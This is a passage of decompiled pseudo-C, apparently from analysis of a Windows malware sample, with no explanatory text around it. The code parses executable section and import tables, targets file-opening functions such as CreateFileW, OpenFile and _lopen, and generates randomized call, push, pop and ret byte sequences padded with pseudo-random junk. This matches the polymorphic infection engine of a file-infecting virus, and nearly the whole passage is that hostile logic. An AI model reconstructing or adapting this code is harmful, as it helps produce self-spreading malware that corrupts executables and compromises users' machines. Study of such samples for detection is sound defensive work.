                                														_t2233 = _t2226 + 0xc;
                                														__eflags = _v60 & 0x80000000;
                                														if((_v60 & 0x80000000) == 0) {
                                															_v60 = _v60 - 0x80000000;
                                															_t415 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                															E0220C943(_v5736 + (_v5632 & 0x0000ffff), 0x228abf0, _v5736 + (_v5632 & 0x0000ffff) + 0x18 + _v5664 * 0x28, 0x28, _v56 + _v5664 * 0x28 + _t415);
                                															_t1540 = _v5736 + (_v5632 & 0x0000ffff);
                                															__eflags = _v56 + _v5664 * 0x28;
                                															_t427 = _t1540 + 0x18; // 0x18
                                															E0221772B(_v56 + _v5664 * 0x28 + _t427,  &_v96, 0x28);
                                															_t2233 = _t2233 + 0x1c;
                                														}
                                														E0221772B(_v56 + _v5736,  &_v5652, 0xf0);
                                														_t2234 = _t2233 + 0xc;
                                														__eflags = _v1244 - _v48;
                                														if(_v1244 <= _v48) {
                                															_t1685 = _v48 + _v1220;
                                															__eflags = _t1685;
                                															_v5788 = _t1685;
                                														} else {
                                															_v5788 = _v1244;
                                														}
                                														_v1280 = _v5788;
                                														_t1306 = E0220C868(_v1280, _v1280, _v5592);
                                														_t2226 = _t2234 + 8;
                                														_v1280 = _t1306;
                                														__eflags = _v1280 - _v1248 - 0x50000;
                                														if(_v1280 - _v1248 <= 0x50000) {
                                															_v5720 = 0;
                                															while(1) {
                                																__eflags = _v5720 - (_v5646 & 0x0000ffff) - 1;
                                																if(_v5720 > (_v5646 & 0x0000ffff) - 1) {
                                																	break;
                                																}
                                																_t455 = _v5736 + (_v5632 & 0x0000ffff) + 0x18; // 0x18
                                																_v1240 = _v56 + _v5720 * 0x28 + _t455;
                                																_t1522 = _v5696;
                                																_t1848 = _v1240;
                                																__eflags =  *((intOrPtr*)(_t1522 + 0x80)) -  *((intOrPtr*)(_t1848 + 0xc));
                                																if( *((intOrPtr*)(_t1522 + 0x80)) <  *((intOrPtr*)(_t1848 + 0xc))) {
                                																	L108:
                                																	_t1524 = _v5720 + 1;
                                																	__eflags = _t1524;
                                																	_v5720 = _t1524;
                                																	continue;
                                																}
                                																_t1525 = _v1240;
                                																_t2144 = _v1240;
                                																_t1526 = _v5696;
                                																__eflags =  *((intOrPtr*)(_t1526 + 0x80)) -  *((intOrPtr*)(_t1525 + 0xc)) +  *((intOrPtr*)(_t2144 + 8));
                                																if( *((intOrPtr*)(_t1526 + 0x80)) >=  *((intOrPtr*)(_t1525 + 0xc)) +  *((intOrPtr*)(_t2144 + 8))) {
                                																	goto L108;
                                																}
                                																_t1851 = _v1240;
                                																__eflags =  *(_t1851 + 0x24) & 0x80000000;
                                																if(( *(_t1851 + 0x24) & 0x80000000) == 0) {
                                																	E0220C9C6(_v5720 * 0x28, E0228D440, _v5736 + (_v5632 & 0x0000ffff) + 0x3c + _v5720 * 0x28,  *(_v1240 + 0x24));
                                																	_t2226 = _t2226 + 0xc;
                                																	_t1856 =  *(_v1240 + 0x24) | 0x80000000;
                                																	__eflags = _t1856;
                                																	 *(_v1240 + 0x24) = _t1856;
                                																}
                                																break;
                                															}
                                															__eflags = _v1248 - 0x19000;
                                															if(_v1248 <= 0x19000) {
                                																L209:
                                																_v5412 = 0xef;
                                																_v5720 = 0;
                                																while(1) {
                                																	_v5404 = 0;
                                																	_v5724 = _v5404;
                                																	__eflags = _v5772 - 0xc8;
                                																	if(_v5772 > 0xc8) {
                                																		_t1334 = E0220CD03( &_v5376,  &_v5404, _v5412, 1, 1);
                                																		_t2226 = _t2226 + 0x14;
                                																		_t1713 = _v5724 + _t1334;
                                																		__eflags = _t1713;
                                																		_v5724 = _t1713;
                                																	}
                                																	 *((char*)(_t2215 + _v5404 - 0x14fc)) = 0xe8;
                                																	_v5404 = _v5404 + 1;
                                																	_t1690 = _v5404;
                                																	_v5396 = _v5404;
                                																	_v5404 = _v5404 + 4;
                                																	__eflags = _v5772 - 0xc8;
                                																	if(_v5772 > 0xc8) {
                                																		__eflags = _v5720 - 0x32;
                                																		if(_v5720 < 0x32) {
                                																			_t1455 = E0220CD03( &_v5376,  &_v5404, _v5412, 0, 1);
                                																			_t2226 = _t2226 + 0x14;
                                																			_t1690 = _v5724 + _t1455;
                                																			__eflags = _t1690;
                                																			_v5724 = _t1690;
                                																		}
                                																	}
                                																	 *((intOrPtr*)(_t2215 + _v5396 - 0x14fc)) = _v5404 - _v5396 - 4;
                                																	__eflags = _v5772 - 0xc8;
                                																	if(_v5772 > 0xc8) {
                                																		_t1453 = E0220CD03( &_v5376,  &_v5404, _v5412, 0, 1);
                                																		_t2226 = _t2226 + 0x14;
                                																		_t1690 = _v5724 + _t1453;
                                																		__eflags = _t1690;
                                																		_v5724 = _t1690;
                                																	}
                                																	_t1310 = E022044CB(_t1690);
                                																	asm("cdq");
                                																	_t1691 = 7;
                                																	_t705 = (_t1310 & 0x0000ffff) % 7;
                                																	__eflags = _t705;
                                																	_v5400 = _t705;
                                																	_v5728 = _v5400;
                                																	while(1) {
                                																		__eflags = _v5728 - _v5400;
                                																		if(_v5728 != _v5400) {
                                																			break;
                                																		}
                                																		_t1449 = E022044CB(_t1691);
                                																		asm("cdq");
                                																		_t1691 = 7;
                                																		_v5728 = (_t1449 & 0x0000ffff) % 7;
                                																	}
                                																	 *((char*)(_t2215 + _v5404 - 0x14fc)) =  *((intOrPtr*)(_v5728 + "XYZ[]^_"));
                                																	_v5404 = _v5404 + 1;
                                																	_t1315 = E022044CB( *((intOrPtr*)(_v5728 + "XYZ[]^_")));
                                																	asm("cdq");
                                																	_v5660 = (_t1315 & 0x0000ffff) % 6;
                                																	__eflags = _v5772 - 0xc8;
                                																	if(_v5772 > 0xc8) {
                                																		__eflags = _v5720 - 0x4b;
                                																		if(_v5720 < 0x4b) {
                                																			_t1448 = E0220CD03( &_v5376,  &_v5404, _v5412 ^  *(0x2203f74 + _v5728 * 8), 0, 1);
                                																			_t2226 = _t2226 + 0x14;
                                																			_t1790 = _v5724 + _t1448;
                                																			__eflags = _t1790;
                                																			_v5724 = _t1790;
                                																		}
                                																	}
                                																	_t1319 = E0220A840(0x12c, _v5660, _t2215 + _v5404 - 0x14fc, _v5728);
                                																	_t2235 = _t2226 + 0x10;
                                																	_v5404 = _v5404 + _t1319;
                                																	__eflags = _v5772 - 0xc8;
                                																	if(_v5772 > 0xc8) {
                                																		__eflags = _v5720 - 0x4b;
                                																		if(_v5720 < 0x4b) {
                                																			_t1445 = E0220CD03( &_v5376,  &_v5404, _v5412, 0, 1);
                                																			_t2235 = _t2235 + 0x14;
                                																			_t2082 = _v5724 + _t1445;
                                																			__eflags = _t2082;
                                																			_v5724 = _t2082;
                                																		}
                                																	}
                                																	_t1322 = E0220A840(0x12d, _v5400, _t2215 + _v5404 - 0x14fc, _v5660);
                                																	_t2236 = _t2235 + 0x10;
                                																	_v5404 = _v5404 + _t1322;
                                																	__eflags = _a8;
                                																	if(__eflags == 0) {
                                																		_t1704 = _v5400;
                                																		_t1326 = E0220C76B(_v5400, __eflags, 5, 1, _v5400, _v1224 - _v5396 + _v1276 - 4,  &_v5376, _v5404,  *(0x2203f74 + _v5400 * 8) ^ 0x000000ef);
                                																		_t2226 = _t2236 + 0x1c;
                                																		_t1992 = _v5404 + _t1326;
                                																		__eflags = _t1992;
                                																		_v5404 = _t1992;
                                																	} else {
                                																		_t1704 = _v5400;
                                																		_t1443 = E0220A840(0x7a, _v5400, _t2215 + _v5404 - 0x14fc, _v1224 - _v5396 + _v1276 - 4);
                                																		_t2226 = _t2236 + 0x10;
                                																		_v5404 = _v5404 + _t1443;
                                																	}
                                																	__eflags = _v5772 - 0xc8;
                                																	if(_v5772 > 0xc8) {
                                																		__eflags = _v5720 - 0x23;
                                																		if(_v5720 < 0x23) {
                                																			_t1440 = E0220CD03( &_v5376,  &_v5404, _v5412 ^  *(0x2203f74 + _v5400 * 8), 1, 1);
                                																			_t2226 = _t2226 + 0x14;
                                																			_t1704 = _v5724 + _t1440;
                                																			__eflags = _t1704;
                                																			_v5724 = _t1704;
                                																		}
                                																	}
                                																	_t1328 = E022044CB(_t1704) & 0x0000ffff;
                                																	asm("cdq");
                                																	__eflags = _t1328 % 0x64 - 0x5f;
                                																	if(_t1328 % 0x64 >= 0x5f) {
                                																		L239:
                                																		 *((char*)(_t2215 + _v5404 - 0x14fc)) = 0xff;
                                																		_v5404 = _v5404 + 1;
                                																		 *((char*)(_t2215 + _v5404 - 0x14fc)) =  *((intOrPtr*)(_v5400 + 0x21e2614));
                                																		_t1332 = _v5404 + 1;
                                																		__eflags = _t1332;
                                																		_v5404 = _t1332;
                                																		goto L240;
                                																	} else {
                                																		__eflags = _v5720 - 0x1e;
                                																		if(_v5720 >= 0x1e) {
                                																			goto L239;
                                																		}
                                																		 *((char*)(_t2215 + _v5404 - 0x14fc)) =  *((intOrPtr*)(_v5400 + "PQRSUVW"));
                                																		_v5404 = _v5404 + 1;
                                																		__eflags = _v5772 - 0xc8;
                                																		if(_v5772 > 0xc8) {
                                																			__eflags = _v5720 - 0x23;
                                																			if(_v5720 < 0x23) {
                                																				_t1437 = E0220CD03( &_v5376,  &_v5404, _v5412 ^  *(0x2203f74 + _v5400 * 8), 0, 1);
                                																				_t2226 = _t2226 + 0x14;
                                																				_t1782 = _v5724 + _t1437;
                                																				__eflags = _t1782;
                                																				_v5724 = _t1782;
                                																			}
                                																		}
                                																		_t1432 = E0220B3EF(_v5404, 0x12345678, _t2215 + _v5404 - 0x14fc, _v5412 ^  *(0x2203f74 + _v5400 * 8));
                                																		_t2226 = _t2226 + 0xc;
                                																		_v5404 = _v5404 + _t1432;
                                																		 *((char*)(_t2215 + _v5404 - 0x14fc)) = 0xc3;
                                																		_v5404 = _v5404 + 1;
                                																		L240:
                                																		__eflags = _v5404 - _v5772;
                                																		if(_v5404 >= _v5772) {
                                																			L242:
                                																			__eflags = _v5720 - 0x64;
                                																			if(_v5720 <= 0x64) {
                                																				_t1710 = _v5720 + 1;
                                																				__eflags = _t1710;
                                																				_v5720 = _t1710;
                                																				continue;
                                																			}
                                																			goto L302;
                                																		}
                                																		_v40 = _v1276;
                                																		_v160 = _v1224 - _v5396 + _v1276 - 4 + _v5396 + 4;
                                																		_t1341 =  *0x22190a4; // 0x4d9070
                                																		_t1342 = E0220D34D(_v5400, _t1341, _v40, _v5400, _v160, _v1276,  &_v5724, _v5392.wDay & 0x0000ffff, 0, _v5656);
                                																		_t2226 = _t2226 + 0x24;
                                																		_v40 = _v40 + _t1342;
                                																		__eflags = _v40 - 0x1116;
                                																		if(_v40 <= 0x1116) {
                                																			_t2002 =  *0x2219004; // 0x4f9078
                                																			E0220C89A(_t2002); // executed
                                																			_t1344 =  *0x2219004; // 0x4f9078
                                																			_t1720 =  *0x22190a4; // 0x4d9070
                                																			E0221772B(_t1720 + 0x1116, _t1344, 0xeeea);
                                																			_t2238 = _t2226 + 0x10;
                                																			_t1722 =  *0x22190a4; // 0x4d9070
                                																			 *((intOrPtr*)(_t1722 + 0x1130)) = 4 + _v5724 * 4;
                                																			_t1347 =  *0x22190a4; // 0x4d9070
                                																			 *((intOrPtr*)(_t1347 + 0x1135)) = _v160 + 0x1116 - _v1276 + 5;
                                																			__eflags = _a8 - 1;
                                																			if(_a8 != 1) {
                                																				_v5412 = _v5404;
                                																			} else {
                                																				_v5412 = 1;
                                																			}
                                																			_t2008 =  *0x22190a4; // 0x4d9070
                                																			 *((intOrPtr*)(_t2008 + 0x288a)) = _v5412;
                                																			_t1349 =  *0x22190a4; // 0x4d9070
                                																			E0221772B(_t1349 + 0x288e, _v56 + _v5716, _v5404);
                                																			E0220C943(_v56 + _v5716, 0x228abf0, _v5716, _v5404, _v56 + _v5716);
                                																			E0221772B(_v56 + _v5716,  &_v5376, _v5404);
                                																			_t2226 = _t2238 + 0x28;
                                																			_v5412 = 0;
                                																			_v5728 = _v5412;
                                																			while(1) {
                                																				_t1358 = _v5412 * 0x408;
                                																				__eflags =  *(0x228abf0 + _t1358);
                                																				if( *(0x228abf0 + _t1358) == 0) {
                                																					break;
                                																				}
                                																				_t901 = 0x228abf4 + _v5412 * 0x408; // 0x28
                                																				_v5728 = _v5728 +  *_t901;
                                																				_t2066 = _v5412 + 1;
                                																				__eflags = _t2066;
                                																				_v5412 = _t2066;
                                																			}
                                																			_v5412 = 0;
                                																			while(1) {
                                																				_t2013 = _v5412;
                                																				__eflags =  *(E0228D440 + _t2013 * 8);
                                																				if( *(E0228D440 + _t2013 * 8) == 0) {
                                																					break;
                                																				}
                                																				_v5412 = _v5412 + 1;
                                																				_t1772 = _v5728 + 4;
                                																				__eflags = _t1772;
                                																				_v5728 = _t1772;
                                																			}
                                																			__eflags = _v5728 - 0x38e;
                                																			if(_v5728 < 0x38e) {
                                																				_t1359 =  *0x22190a4; // 0x4d9070
                                																				 *((char*)(_t1359 + 0x2889)) = 1;
                                																				 *0x2289b49 = 0;
                                																				 *0x2289b4a = 0;
                                																				 *0x2289b4b = 0;
                                																				 *0x2289b4c = 0;
                                																				_t1729 =  *0x22190a4; // 0x4d9070
                                																				E0221772B(_t1729 + 0x2a8e, 0x22883dc, 0x1770);
                                																				_t2241 = _t2226 + 0xc;
                                																				_v5728 = 0x244d;
                                																				_t2014 =  *0x22190a4; // 0x4d9070
                                																				 *(_t2014 + _v5728) = _v5612;
                                																				_v5728 = _v5728 + 4;
                                																				_v5412 = 0;
                                																				_v5660 = _v5412;
                                																				while(1) {
                                																					__eflags = _v5660 - 5;
                                																					if(_v5660 >= 5) {
                                																						break;
                                																					}
                                																					_v100 = 0;
                                																					_v5824 = _v5660;
                                																					__eflags = _v5824 - 4;
                                																					if(_v5824 > 4) {
                                																						L270:
                                																						__eflags = _v100;
                                																						if(_v100 == 0) {
                                																							L275:
                                																							_t1422 = _v5660 + 1;
                                																							__eflags = _t1422;
                                																							_v5660 = _t1422;
                                																							continue;
                                																						}
                                																						_v5412 = 0;
                                																						while(1) {
                                																							__eflags = _v5412 - 4;
                                																							if(_v5412 >= 4) {
                                																								goto L275;
                                																							}
                                																							_t1769 =  *0x22190a4; // 0x4d9070
                                																							 *((intOrPtr*)(_t1769 + _v5728)) =  *((intOrPtr*)(_v100 + _v5412 * 4));
                                																							_v5412 = _v5412 + 1;
                                																							_t1425 = _v5728 + 4;
                                																							__eflags = _t1425;
                                																							_v5728 = _t1425;
                                																						}
                                																						goto L275;
                                																					}
                                																					switch( *((intOrPtr*)(_v5824 * 4 +  &M02210931))) {
                                																						case 0:
                                																							_v100 =  &_v5768;
                                																							goto L270;
                                																						case 1:
                                																							__ecx =  &_v5688;
                                																							_v100 =  &_v5688;
                                																							goto L270;
                                																						case 2:
                                																							_v100 =  &_v140;
                                																							goto L270;
                                																						case 3:
                                																							__eax =  &_v120;
                                																							_v100 =  &_v120;
                                																							goto L270;
                                																						case 4:
                                																							__ecx =  &_v1272;
                                																							_v100 =  &_v1272;
                                																							goto L270;
                                																					}
                                																				}
                                																				_t1362 =  *0x22190a4; // 0x4d9070
                                																				_v148 = _t1362 + 0x24a1;
                                																				_v5744 = 0;
                                																				E02204060(_v148, 0, 0x3e6);
                                																				_t2242 = _t2241 + 0xc;
                                																				 *(_v148 + _v5744) = _v1248;
                                																				_v5744 = _v5744 + 4;
                                																				 *(_v148 + _v5744) = _v1244;
                                																				_v5744 = _v5744 + 4;
                                																				 *(_v148 + _v5744) = _v5692;
                                																				_t1739 = _v5744 + 4;
                                																				_v5744 = _v5744 + 4;
                                																				_v5412 = 0;
                                																				while(1) {
                                																					_t1369 = _v5412 * 0x408;
                                																					__eflags =  *(0x228abf0 + _t1369);
                                																					if( *(0x228abf0 + _t1369) == 0) {
                                																						break;
                                																					}
                                																					__eflags = _v5412 - 0xa;
                                																					if(_v5412 >= 0xa) {
                                																						break;
                                																					}
                                																					_t980 = 0x228abf0 + _v5412 * 0x408; // 0x747865
                                																					 *(_v148 + _v5744) =  *_t980;
                                																					_v5744 = _v5744 + 4;
                                																					_t984 = 0x228abf4 + _v5412 * 0x408; // 0xfc0000
                                																					 *(_v148 + _v5744) =  *_t984 + 0x25;
                                																					_v5744 = _v5744 + 4;
                                																					_t990 = 0x228abf4 + _v5412 * 0x408; // 0xfc0000
                                																					E0221772B(_v148 + _v5744, 0x228abf8 + _v5412 * 0x408,  *_t990);
                                																					_t2242 = _t2242 + 0xc;
                                																					_t1739 = _v5412 * 0x408;
                                																					_v5744 = _v5744 +  *((intOrPtr*)(0x228abf4 + _v5412 * 0x408));
                                																					_t2057 = _v5412 + 1;
                                																					__eflags = _t2057;
                                																					_v5412 = _t2057;
                                																				}
                                																				_v5744 = _v5744 + 4;
                                																				_v5412 = 0;
                                																				while(1) {
                                																					__eflags =  *(E0228D440 + _v5412 * 8);
                                																					if(__eflags == 0) {
                                																						break;
                                																					}
                                																					__eflags = _v5412 - 0x64;
                                																					if(__eflags >= 0) {
                                																						break;
                                																					}
                                																					 *(_v148 + _v5744) =  *(E0228D440 + _v5412 * 8);
                                																					_v5744 = _v5744 + 4;
                                																					 *(_v148 + _v5744) =  *(0x228d444 + _v5412 * 8);
                                																					_v5744 = _v5744 + 4;
                                																					_t1739 = _v5412 + 1;
                                																					__eflags = _t1739;
                                																					_v5412 = _t1739;
                                																				}
                                																				_t2024 =  *0x2219004; // 0x4f9078
                                																				_t1372 = E02206981(_t1739, __eflags, _t2024, 0x24, 0, 0);
                                																				_t2243 = _t2242 + 0x10;
                                																				_v5412 = _t1372;
                                																				__eflags = _v5412;
                                																				if(_v5412 != 0) {
                                																					__eflags = _v5412 - 0x80;
                                																					if(_v5412 > 0x80) {
                                																						__eflags = _v5412 - 0x400;
                                																						if(_v5412 < 0x400) {
                                																							_t1753 =  *0x2219004; // 0x4f9078
                                																							_t2041 =  *0x22190a4; // 0x4d9070
                                																							__eflags = _t2041 + 0x4202;
                                																							E0221772B(_t2041 + 0x4202, _t1753, _v5412 + 1);
                                																							_t2243 = _t2243 + 0xc;
                                																						}
                                																					}
                                																				}
                                																				_t1374 =  *0x22190a4; // 0x4d9070
                                																				_t1742 =  *0x22190a4; // 0x4d9070
                                																				E0220CACD(_t1742 + 0x1116, _t1742 + 0x1116, 0xeeea, _t1374 + _v1276 + (_v5392.wDay & 0x0000ffff), _v5656);
                                																				_t2244 = _t2243 + 0x10;
                                																				__eflags = _v1244 - _v48;
                                																				if(_v1244 <= _v48) {
                                																					_v5828 = _v48;
                                																				} else {
                                																					_v5828 = _v1244;
                                																				}
                                																				_t1377 =  *0x22190a4; // 0x4d9070
                                																				_t1746 = _v56 + _v5828;
                                																				E0221772B(_v56 + _v5828, _t1377, _v44 + 0x10000);
                                																				_t2226 = _t2244 + 0xc;
                                																				__eflags = _v1244 - _v48;
                                																				if(_v1244 <= _v48) {
                                																					_t1746 = _v48;
                                																					_v5832 = _v48;
                                																				} else {
                                																					_v5832 = _v1244;
                                																				}
                                																				_v5660 = _v5832 + 0x10000;
                                																				_v5728 = _v1248 + 0x60000 - _v5660 - 0x400;
                                																				_t1383 = E022044CB(_t1746);
                                																				asm("cdq");
                                																				_v5396 = (_t1383 & 0x0000ffff) % 0x64 + GetTickCount();
                                																				__eflags = _v5728 - 0x10000;
                                																				if(_v5728 <= 0x10000) {
                                																					L301:
                                																					_v5700 = 1;
                                																					goto L302;
                                																				} else {
                                																					_t1387 = E022044CB(0x64);
                                																					asm("cdq");
                                																					asm("cdq");
                                																					_v5728 = (_t1387 & 0x0000ffff) % 0x9000 + 0x1000 + ((_t1387 & 0x0000ffff) % 0x00009000 & 0x00000003) >> 2;
                                																					_v5412 = 0;
                                																					while(1) {
                                																						__eflags = _v5412 - _v5728;
                                																						if(_v5412 >= _v5728) {
                                																							goto L301;
                                																						}
                                																						_t1749 = _v5396;
                                																						 *((intOrPtr*)(_v56 + _v5660)) = _v5396;
                                																						_v5412 = _v5412 + 1;
                                																						_v5660 = _v5660 + 4;
                                																						_t1398 = E022044CB(_t1749);
                                																						asm("cdq");
                                																						_t1752 = _v5396 + (_v5396 * _v5728 ^ _v5660 * ((_t1398 & 0x0000ffff) % 0x00000064 + 0x0000000a));
                                																						__eflags = _t1752;
                                																						_v5396 = _t1752;
                                																					}
                                																					goto L301;
                                																				}
                                																			}
                                																		} else {
                                																		}
                                																		goto L302;
                                																	}
                                																}
                                															}
                                															_t1457 = E0220C90D(_v5696,  *((intOrPtr*)(_v5696 + 0x80)), _v1240);
                                															_t2226 = _t2226 + 8;
                                															_v5748 = _v56 + _t1457;
                                															_v156 = 0;
                                															while(1) {
                                																L112:
                                																_t1798 = _v5696;
                                																__eflags = _v156 -  *((intOrPtr*)(_t1798 + 0x84));
                                																if(_v156 >  *((intOrPtr*)(_t1798 + 0x84))) {
                                																	goto L209;
                                																}
                                																_t1459 = IsBadHugeWritePtr(_v5748, 0x14);
                                																__eflags = _t1459;
                                																if(_t1459 == 0) {
                                																	_t1799 = _v5748;
                                																	__eflags =  *(_t1799 + 0xc);
                                																	if( *(_t1799 + 0xc) != 0) {
                                																		_t2091 = _v5748;
                                																		__eflags =  *(_t2091 + 0xc);
                                																		if( *(_t2091 + 0xc) <= 0) {
                                																			L120:
                                																			_v5792 = 1;
                                																			L121:
                                																			__eflags = _v5792;
                                																			if(_v5792 == 0) {
                                																				_t2092 = _v5748;
                                																				__eflags =  *(_t2092 + 4);
                                																				if( *(_t2092 + 4) == 0) {
                                																					_t1460 = _v5748;
                                																					__eflags =  *(_t1460 + 0x10);
                                																					if( *(_t1460 + 0x10) != 0) {
                                																						L128:
                                																						_t2093 = _v5748;
                                																						__eflags =  *((intOrPtr*)(_t2093 + 8)) - 0xffffffff;
                                																						if( *((intOrPtr*)(_t2093 + 8)) != 0xffffffff) {
                                																							_t1514 = _v5748;
                                																							__eflags =  *(_t1514 + 8);
                                																							if( *(_t1514 + 8) != 0) {
                                																								_t1516 = E0220C90D(_v5696,  *((intOrPtr*)(_v5696 + 0x80)), _v1240);
                                																								_t521 = _v156 + 8; // 0x8
                                																								E0220C9C6(_v156, E0228D440, _t1516 + _t521,  *(_v5748 + 8));
                                																								_t2226 = _t2226 + 0x14;
                                																								 *(_v5748 + 8) = 0xffffffff;
                                																							}
                                																						}
                                																						_t1800 = _v5748;
                                																						__eflags =  *(_t1800 + 0x10);
                                																						if( *(_t1800 + 0x10) == 0) {
                                																							__eflags =  *_v5748;
                                																							if( *_v5748 <= 0) {
                                																								L142:
                                																								_v5800 = 1;
                                																								L143:
                                																								__eflags = _v5800;
                                																								if(_v5800 == 0) {
                                																									goto L145;
                                																								}
                                																								goto L111;
                                																							}
                                																							__eflags =  *_v5748 - _v5572;
                                																							if( *_v5748 >= _v5572) {
                                																								goto L142;
                                																							}
                                																							_v5800 = 0;
                                																							goto L143;
                                																						} else {
                                																							_t2136 = _v5748;
                                																							__eflags =  *(_t2136 + 0x10);
                                																							if( *(_t2136 + 0x10) <= 0) {
                                																								L135:
                                																								_v5796 = 1;
                                																								L136:
                                																								__eflags = _v5796;
                                																								if(_v5796 == 0) {
                                																									L145:
                                																									_t2095 = _v5748;
                                																									__eflags =  *(_t2095 + 0x10);
                                																									if( *(_t2095 + 0x10) == 0) {
                                																										_v5804 =  *_v5748;
                                																									} else {
                                																										_v5804 =  *((intOrPtr*)(_v5748 + 0x10));
                                																									}
                                																									_t1462 = E0220C90D(_v1240, _v5804, _v1240);
                                																									_t2245 = _t2226 + 8;
                                																									_t1463 = IsBadHugeWritePtr(_v56 + _t1462, "true");
                                																									__eflags = _t1463;
                                																									if(_t1463 != 0) {
                                																										_v1228 = 0;
                                																									} else {
                                																										_t2133 = _v5748;
                                																										__eflags =  *(_t2133 + 0x10);
                                																										if( *(_t2133 + 0x10) == 0) {
                                																											_v5808 =  *_v5748;
                                																										} else {
                                																											_v5808 =  *((intOrPtr*)(_v5748 + 0x10));
                                																										}
                                																										_t1509 = E0220C90D(_v1240, _v5808, _v1240);
                                																										_t2245 = _t2245 + 8;
                                																										_v1228 = _v56 + _t1509;
                                																									}
                                																									_t2098 = _v5748;
                                																									__eflags =  *(_t2098 + 0x10);
                                																									if( *(_t2098 + 0x10) == 0) {
                                																										_v5812 =  *_v5748;
                                																									} else {
                                																										_v5812 =  *((intOrPtr*)(_v5748 + 0x10));
                                																									}
                                																									_t1465 = E0220C90D(_v1240, _v5812, _v1240);
                                																									_t2226 = _t2245 + 8;
                                																									_t1466 = IsBadHugeWritePtr(_v56 + _t1465, "true");
                                																									__eflags = _t1466;
                                																									if(_t1466 != 0) {
                                																										_v5668 = 0;
                                																									} else {
                                																										_t2130 = _v5748;
                                																										__eflags =  *(_t2130 + 0x10);
                                																										if( *(_t2130 + 0x10) == 0) {
                                																											_v5816 =  *_v5748;
                                																										} else {
                                																											_v5816 =  *((intOrPtr*)(_v5748 + 0x10));
                                																										}
                                																										_t1505 = E0220C90D(_v1240, _v5816, _v1240);
                                																										_t2226 = _t2226 + 8;
                                																										_v5668 = _v56 + _t1505;
                                																									}
                                																									_t1467 = IsBadHugeWritePtr(_v1228, "true");
                                																									__eflags = _t1467;
                                																									if(_t1467 == 0) {
                                																										_t1469 = IsBadHugeWritePtr(_v5668, "true");
                                																										__eflags = _t1469;
                                																										if(_t1469 == 0) {
                                																											while(1) {
                                																												_t1471 = IsBadHugeWritePtr(_v1228, "true");
                                																												__eflags = _t1471;
                                																												if(_t1471 != 0) {
                                																													break;
                                																												}
                                																												_t1472 = IsBadHugeWritePtr(_v5668, "true");
                                																												__eflags = _t1472;
                                																												if(_t1472 == 0) {
                                																													__eflags =  *_v1228 & 0x80000000;
                                																													if(( *_v1228 & 0x80000000) != 0) {
                                																														L175:
                                																														L168:
                                																														_v1228 = _v1228 + 4;
                                																														_t2104 = _v5668 + 4;
                                																														__eflags = _t2104;
                                																														_v5668 = _t2104;
                                																														continue;
                                																													}
                                																													__eflags =  *_v5668 & 0x80000000;
                                																													if(( *_v5668 & 0x80000000) == 0) {
                                																														__eflags =  *_v1228;
                                																														if( *_v1228 == 0) {
                                																															L179:
                                																															L208:
                                																															L111:
                                																															_v5748 = _v5748 + 0x14;
                                																															_t1477 = _v156 + 0x14;
                                																															__eflags = _t1477;
                                																															_v156 = _t1477;
                                																															goto L112;
                                																														}
                                																														__eflags =  *_v1228;
                                																														if( *_v1228 == 0) {
                                																															goto L179;
                                																														}
                                																														__eflags =  *_v5668;
                                																														if( *_v5668 != 0) {
                                																															__eflags =  *_v1228;
                                																															if( *_v1228 <= 0) {
                                																																L183:
                                																																_v5820 = 1;
                                																																L184:
                                																																__eflags = _v5820;
                                																																if(_v5820 == 0) {
                                																																	_t1480 = E0220C90D(_v1228,  *_v1228, _v1240);
                                																																	_t2226 = _t2226 + 8;
                                																																	_t1481 = IsBadHugeWritePtr(_v56 + _t1480, "true");
                                																																	__eflags = _t1481;
                                																																	if(_t1481 != 0) {
                                																																		L188:
                                																																		goto L208;
                                																																	}
                                																																	_t1483 = E0220C90D( *_v1228,  *_v1228, _v1240);
                                																																	_t2226 = _t2226 + 8;
                                																																	_v5732 = _v56 + _t1483;
                                																																	_t1486 = IsBadHugeWritePtr(_v5732 + 2, 0x20);
                                																																	__eflags = _t1486;
                                																																	if(_t1486 == 0) {
                                																																		__eflags = _v5732 + 2;
                                																																		if(_v5732 + 2 != 0) {
                                																																			_v40 = _v5668 - _v56 +  *((intOrPtr*)(_v1240 + 0xc)) -  *((intOrPtr*)(_v1240 + 0x14));
                                																																			_t1488 =  *0x21e10b0(_v5732 + 2, "CreateFileW");
                                																																			__eflags = _t1488;
                                																																			if(_t1488 == 0) {
                                																																				__eflags = _v5672 - 4;
                                																																				if(_v5672 < 4) {
                                																																					 *((intOrPtr*)(_t2215 + _v5672 * 4 - 0x1634)) = _v40;
                                																																					_t2128 = _v5672 + 1;
                                																																					__eflags = _t2128;
                                																																					_v5672 = _t2128;
                                																																				}
                                																																			}
                                																																			_t1491 =  *0x21e10b0(_v5732 + 2, "CreateFileA");
                                																																			__eflags = _t1491;
                                																																			if(_t1491 == 0) {
                                																																				__eflags = _v124 - 4;
                                																																				if(_v124 < 4) {
                                																																					 *((intOrPtr*)(_t2215 + _v124 * 4 - 0x88)) = _v40;
                                																																					_t1502 = _v124 + 1;
                                																																					__eflags = _t1502;
                                																																					_v124 = _t1502;
                                																																				}
                                																																			}
                                																																			_t1492 =  *0x21e10b0(_v5732 + 2, "GetProcAddress");
                                																																			__eflags = _t1492;
                                																																			if(_t1492 == 0) {
                                																																				__eflags = _v104 - 4;
                                																																				if(_v104 < 4) {
                                																																					 *((intOrPtr*)(_t2215 + _v104 * 4 - 0x74)) = _v40;
                                																																					_t1824 = _v104 + 1;
                                																																					__eflags = _t1824;
                                																																					_v104 = _t1824;
                                																																				}
                                																																			}
                                																																			_t1493 =  *0x21e10b0(_v5732 + 2, "OpenFile");
                                																																			__eflags = _t1493;
                                																																			if(_t1493 == 0) {
                                																																				__eflags = _v1256 - 4;
                                																																				if(_v1256 < 4) {
                                																																					 *((intOrPtr*)(_t2215 + _v1256 * 4 - 0x4f4)) = _v40;
                                																																					_t2124 = _v1256 + 1;
                                																																					__eflags = _t2124;
                                																																					_v1256 = _t2124;
                                																																				}
                                																																			}
                                																																			_t1496 =  *0x21e10b0(_v5732 + 2, "_lopen");
                                																																			__eflags = _t1496;
                                																																			if(_t1496 == 0) {
                                																																				__eflags = _v5752 - 4;
                                																																				if(_v5752 < 4) {
                                																																					 *(_t2215 + _v5752 * 4 - 0x1684) = _v40;
                                																																					_t1498 = _v5752 + 1;
                                																																					__eflags = _t1498;
                                																																					_v5752 = _t1498;
                                																																				}
                                																																			}
                                																																		}
                                																																		goto L168;
                                																																	} else {
                                																																		goto L208;
                                																																	}
                                																																	goto L188;
                                																																}
                                																																goto L208;
                                																															}
